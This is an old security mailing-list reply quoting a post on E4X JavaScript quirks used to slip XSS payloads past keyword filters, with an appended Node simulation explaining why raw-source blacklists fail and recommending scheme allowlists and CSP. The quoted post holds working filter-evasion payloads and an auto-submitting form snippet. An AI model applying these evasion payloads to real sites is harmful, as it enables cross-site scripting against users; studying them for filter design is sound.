Which browsers support E4X?

2008/9/8 大风 <[EMAIL PROTECTED]>:

> If you've not been following my sla.ckers thread on unusual javascript
> <http://sla.ckers.org/forum/read.php?2,15812> then you're missing out.
> My idea was to gather interesting, weird and wonderful javascript tricks
> which are useful for filter evasion and coding. I investigated E4X quite a
> lot for this purpose and found a few cool things that I'll share with you.
>
> *Using {} for keyword evasion*
>
> Let's say a filter disallows certain words. Because the {} allows you to
> execute a javascript block, if you execute a block that returns a blank
> string then you can use it for keyword evasion. The new array constructor
> creates a blank array, but when used in concatenation it results in a blank
> string.
>
> location=<text>javascr{*new* Array}ipt:aler{*new* Array}t(1)</text>
>
> Another example:-
>
> location=<text>javascr{[]}ipt:aler{[]}t(1)</text>
>
> *Weird syntax fun*
>
> E4X also has some javascript syntax quirks that normally would cause a
> parsing error but are perfectly valid.
>
> *default* xml *namespace* = alert(1)
>
> Some more weird looking stuff:-
>
> <>{*eval*(/alert(1)/[-1])}</|>>[EMAIL PROTECTED]::xyz
>
> ([EMAIL PROTECTED]::abc?alert:[EMAIL PROTECTED]::xyz)(1)
>
> *Numbers as E4X*
>
> For some reason numbers can be used as XML:
>
> [EMAIL PROTECTED]/(are=1)%1..*::xml
>
> *Encoding with entities*
>
> Giorgio <http://hackademix.net/> brought this to my attention when he was
> hacking my unsuccessful Firefox sandbox experiment. You can use html
> entities and they will be decoded when using the XML data as strings.
>
> alert(<>"</>)
>
> A more interesting example with decimal entities:-
>
> *eval*(<>alert(1)</>+[])
>
> Hackvertor supports morphs which allow you to generate this sort of data
> automatically, useful for fuzzing XSS filters:-
> E4X morph <http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBlNHhfZGVjX21vcnBoX2Z1bGxfMz5hbGVydCgxKTxAL2U0eF9kZWNfbW9ycGhfZnVsbF8zPg%3D%3D>
>
> *Form creation*
>
> Making forms with E4X is lovely, check it out:-
>
> f=<form/>;
> [EMAIL PROTECTED]'x';
> [EMAIL PROTECTED]'url.php';
> [EMAIL PROTECTED]'post';
> [EMAIL PROTECTED]'h'
> [EMAIL PROTECTED];
> document.body.innerHTML=f;
> document.getElementById('x').submit();
>
>
> *[Ph4nt0m] <http://www.ph4nt0m.org/>*
> *[Ph4nt0m Security Team]*
> *[EMAIL PROTECTED] <http://blog.ph4nt0m.org/>*
> * Email: [EMAIL PROTECTED]
> * PingMe: <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
>
> *=== V3ry G00d, V3ry Str0ng ===*
> *=== Ultim4te H4cking ===*
> *=== XPLOITZ ! ===*
> *=== #_# ===*
> *#If you brave, there is nothing you cannot achieve.#*
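The quoted post relies on two E4X behaviours: a `{expr}` block inside an XML literal is evaluated and its result is string-concatenated into the text (so `{[]}` and `{new Array}` vanish), and entities in the XML text are decoded when the XML object is used as a string. E4X is not available in any current engine (Firefox removed it in version 21), so the following is an added example, not code from the post: a plain-JavaScript model of those two behaviours that runs in Node, used to show why a substring blacklist sees one string and the browser executes another. The blacklist words, the payloads and all function names are constructed for this demo.

```javascript
// Added example (not from the quoted post): simulates the E4X XML-literal
// string conversion so the filter-evasion point can be reproduced offline.

// The kind of substring blacklist the {} trick is designed to defeat.
const BLOCKED_WORDS = ["javascript:", "alert"];

function naiveFilter(source) {
  const lower = source.toLowerCase();
  return BLOCKED_WORDS.some((w) => lower.includes(w)); // true = blocked
}

// Minimal entity decoder: decimal, hex and the five XML named entities.
const NAMED = { quot: '"', amp: "&", lt: "<", gt: ">", apos: "'" };
function decodeEntities(text) {
  return text.replace(/&(#x([0-9a-f]+)|#(\d+)|(\w+));/gi, (m, _, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    const key = name.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED, key) ? NAMED[key] : m;
  });
}

// String value of an E4X-style literal <tag>...</tag> or the anonymous <>...</>.
// Each {expr} is evaluated and String()-coerced, as E4X did on conversion.
// new Function is used purely to imitate the engine in an offline demo;
// never evaluate attacker input like this in a real filter.
function e4xTextValue(literal) {
  const m = /^<(\w*)>([\s\S]*)<\/\1>$/.exec(literal.trim());
  if (!m) throw new Error("not an XML literal: " + literal);
  const body = m[2].replace(/\{([^}]*)\}/g, (_, expr) => {
    // String([]) === "" and String(new Array) === "", which is the whole trick.
    return String(new Function(`return (${expr});`)());
  });
  return decodeEntities(body);
}

// Runs the two keyword-evasion payloads from the post and a decimal-entity
// payload of the same shape through the blacklist twice: once on the raw
// source (what the filter sees) and once on the evaluated value (what the
// browser would execute). Payloads are constructed for this demo.
function demonstrate() {
  const payloads = [
    "<text>javascr{new Array}ipt:aler{new Array}t(1)</text>",
    "<text>javascr{[]}ipt:aler{[]}t(1)</text>",
    "<>&#97;&#108;&#101;&#114;&#116;(1)</>",
  ];
  return payloads.map((p) => ({
    payload: p,
    blockedAsSource: naiveFilter(p),
    value: e4xTextValue(p),
    blockedAsValue: naiveFilter(e4xTextValue(p)),
  }));
}

for (const r of demonstrate()) {
  console.log(`${r.payload}\n  source blocked: ${r.blockedAsSource}` +
              `\n  evaluates to:   ${r.value}\n  value blocked:  ${r.blockedAsValue}`);
}
```

The point of the two columns is that the filter and the interpreter disagree on what the string is; every payload in the post passes the source check and fails the value check. The practical consequence is that a blacklist on raw source cannot be fixed by adding words, because any evaluation-time transformation (E4X blocks, entity decoding, the Hackvertor morphs mentioned above) produces a new source form. The durable defences are structural: reject any user-controlled value as a `location`/`href` unless its resolved scheme is on an allowlist, and rely on CSP rather than on recognising `javascript:` or `alert` in the input.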
To post to this mailing list, send mail to [email protected]. To unsubscribe, send mail to [EMAIL PROTECTED].

